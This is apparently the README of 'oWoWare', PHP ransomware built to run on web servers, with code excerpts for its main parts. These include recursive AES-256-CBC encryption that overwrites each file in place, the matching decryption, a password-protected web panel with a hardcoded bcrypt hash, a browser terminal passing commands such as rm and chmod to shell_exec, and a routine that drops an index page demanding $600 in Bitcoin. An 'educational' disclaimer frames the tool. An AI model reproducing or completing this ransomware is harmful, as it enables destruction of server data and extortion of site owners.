oWoWare is ransomware focused on web servers, developed in PHP. It provides a secure interface for tool management and terminal command execution. With file encryption and decryption functionalities using AES-256-CBC (Cipher Block Chaining with a 256-bit key)
, as well as an integrated terminal, oWoWare is designed for technical testing and raising awareness about protection against ransomware attacks.
oWoWare ransomware developed for educational, simulation, and attack demonstration purposes.
The author is not responsible for any misuse of it.
- Encryption Type Used:
- AES-256-CBC (Cipher Block Chaining with a 256-bit key) is used, a symmetric encryption algorithm.
- The encryption key must be at least 32 characters long to ensure security in this mode.
- The code also generates an IV (Initialization Vector) using
, which is concatenated to the encrypted content and stored alongside the file.
$iv_length = openssl_cipher_iv_length('AES-256-CBC');
$iv = openssl_random_pseudo_bytes($iv_length);
$encrypted_contents = openssl_encrypt($file_contents, 'AES-256-CBC', $key, OPENSSL_RAW_DATA, $iv);
$final_content = $iv . $encrypted_contents;
file_put_contents($file_path, $final_content);
- Encryption Process:
- Each file in the specified directory is encrypted, skipping files named
. - The encrypted content includes the IV and the encrypted content concatenated. This encrypted content replaces the original file.
- Each file in the specified directory is encrypted, skipping files named
function encrypt_directory($target_dir, $key, &$processed_files, &$error_files) {
// Iterate over files and subdirectories
foreach ($iterator as $item) {
if ($item->isFile()) {
// Encrypt the file content
$iv = openssl_random_pseudo_bytes($iv_length);
$encrypted_contents = openssl_encrypt($file_contents, 'AES-256-CBC', $key, OPENSSL_RAW_DATA, $iv);
$final_content = $iv . $encrypted_contents;
file_put_contents($file_path, $final_content);
- Error Handling:
- The code handles errors in file reading, IV generation, encryption, and writing the encrypted files.
- Errors are stored in the
array, and successfully processed files are listed in$processed_files
Decryption Process:
- The IV is extracted from the encrypted content and used to decrypt the files using the same symmetric key
. - The decrypted files are rewritten with the original content, restoring the file.
- The IV is extracted from the encrypted content and used to decrypt the files using the same symmetric key
Error Handling:
- Errors in reading, decrypting, and writing files are handled similarly to the encryption process.
function decrypt_directory($target_dir, $key, &$processed_files, &$error_files) {
foreach ($iterator as $item) {
if ($item->isFile()) {
$iv = substr($file_contents, 0, $iv_length);
$encrypted_contents = substr($file_contents, $iv_length);
$decrypted_contents = openssl_decrypt($encrypted_contents, 'AES-256-CBC', $key, OPENSSL_RAW_DATA, $iv);
file_put_contents($file_path, $decrypted_contents);
- The login system compares a predefined username (
) and a password stored as a bcrypt hash. - The stored hash uses bcrypt with a work factor of 15, ensuring brute force attempts are slow.
- It protects against brute force attacks by limiting login attempts to 5 failed attempts before locking the user out for 15 minutes.
- The login system compares a predefined username (
CSRF Tokens (Cross-Site Request Forgery):
- To protect against CSRF attacks, a CSRF token is generated and validated on each POST request.
Session ID Regeneration:
- Once the user successfully authenticates, a new session is generated with
to prevent session fixation attacks.
- Once the user successfully authenticates, a new session is generated with
define('USERNAME', 'admin');
define('PASSWORD_HASH', '$2a$15$xEbegd2Cf26u2/2dw4LLXu0uJbqifWGFWXXh0gBkTDoImJOCJ5Ogu');
if ($username === USERNAME && password_verify($password, PASSWORD_HASH)) {
$_SESSION['authenticated'] = true;
$_SESSION['login_attempts'] = 0;
- The user can specify a directory to encrypt or decrypt files. The directory path is validated before proceeding.
- The code uses
to iterate through the files and directories within the target directory.
Files:- An
file is generated or updated in each encrypted directory with a message indicating that the files have been encrypted. - The file content includes a message simulating a ransomware attack, demanding $600 in Bitcoin to a specific address.
- An
function create_index_file($dir_path, &$error_files) {
$content = "
__ ____ __
/ / / __ \ \ \
/ / ___ | | | | ___ \ \
> / / _ \| | | |/ _ \ > \
/ ^ ( (_) )\ \/ /( (_) ) ^ \
/_/ \_\___(___||___)___/_/ \_\
oWoWare V.1.0
<h2>Ooops, your files have been encrypted!</h2>
Send $600 worth of bitcoin to this address:
file_put_contents($index_file, $content);
- The system has an integrated terminal that allows commands to be executed from the browser.
- Allowed commands are restricted by a whitelist (
), which includes common system administration commands likels
, among others. - The results of the executed commands are displayed in real-time in the user interface.
- Each executed command is logged in a log file in the
$allowed_commands = ['ls', 'pwd', 'cat', 'cp', 'mv', 'rm', 'mkdir', 'chmod', 'chown', 'ping', 'top', 'df', 'uname', ...];
if (in_array($base_command, $allowed_commands)) {
$safe_command = escapeshellcmd($command);
$output = shell_exec($safe_command . ' 2>&1');
- The user must provide an encryption key (minimum of 32 characters) to encrypt or decrypt the files.
- If the key is less than 32 characters, an error is shown indicating that the key is insufficient.
if (strlen($key) < 32) {
$encryption_error = "The key must be at least 32 characters for AES-256.";
oWoWare ransomware developed for educational, simulation, and attack demonstration purposes.
The author is not responsible for any misuse of it.